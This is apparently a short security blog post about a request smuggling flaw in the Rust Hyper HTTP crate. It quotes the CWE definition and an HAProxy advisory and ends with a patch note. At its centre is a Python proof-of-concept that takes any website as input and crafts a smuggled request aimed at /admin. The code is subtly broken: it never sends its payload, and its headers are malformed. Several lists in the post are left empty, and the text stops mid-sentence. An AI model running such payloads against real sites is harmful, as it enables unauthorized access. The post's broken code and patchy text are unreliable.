Rust Hyper Request smuggling

The exploit of the day is a request smuggling vulnerability found in the HTTP Rust library Hyper.

Firo Solutions Request Smuggling

Request Smuggling

Request smuggling is sending 2 requests inside one payload so normally you would go to the website and one request is sent
but with request smuggling you send 1 payload of data and fool the server that the request is 2 different request instead of one.
This method of attacking got very popular after affecting the popular HAProxy and the great security researcher
published a blog post talking about it.

HTTP smuggling has affected a lot of software like:

Apache tomcat





And many more even squid.

It even got a CWE(Common Weakness Enumeration) definition: “When malformed or abnormal HTTP requests are interpreted by one or more entities in the data flow between the user and the web server, such as a proxy or firewall, they can be interpreted inconsistently, allowing the attacker to “smuggle” a request to one device without the other device being aware of it.”

An interesting discovery was found in the hyper HTTP crate.
It’s a simple bug the client that handles the “transfer-encoding: chunked” part of the
GET request wrongly.


Nathan Davison reported a vulnerability in HAProxy:

Nathan Davison (@ndavison) reported that in legacy mode we didn't correctly
rejected messages featuring a transfer-encoding header missing the "chunked"
value. The impact was limited, but if combined with "http-reuse always", it
could be used as an help to construct a content smuggling attack against a
vulnerable component employing a lenient parser which would ignore the
content-length header as soon as it sees a transfer-encoding one, without even
parsing it.

He then wrote a blog post about using HAProxy as a load balancer and a python flask backend
then by exploiting that HAProxy doesnt reject the bad “Transfer-Encoding: chunked” messages
was able to cause a http-smuggling attack.

Poc example exploit

import socket 

website = input('gime website:')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((website, 80))

stuff = """

GET /stuff HTTP/1.1
Host: {}
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Transfer-Encoding: chunked


GET /admin HTTP/1.1
Host: {}
Foo: xGET /home HTTP/1.1
Host: {}

""".format(website, website, website)

response = s.recv(1024) # change if needed 
print('got back: ', response)

Check your cargo.toml files here:

The hyper crate has been patched since 0.12.34

Request smuggling was also one of the challanges in a recent
capture the flag contest: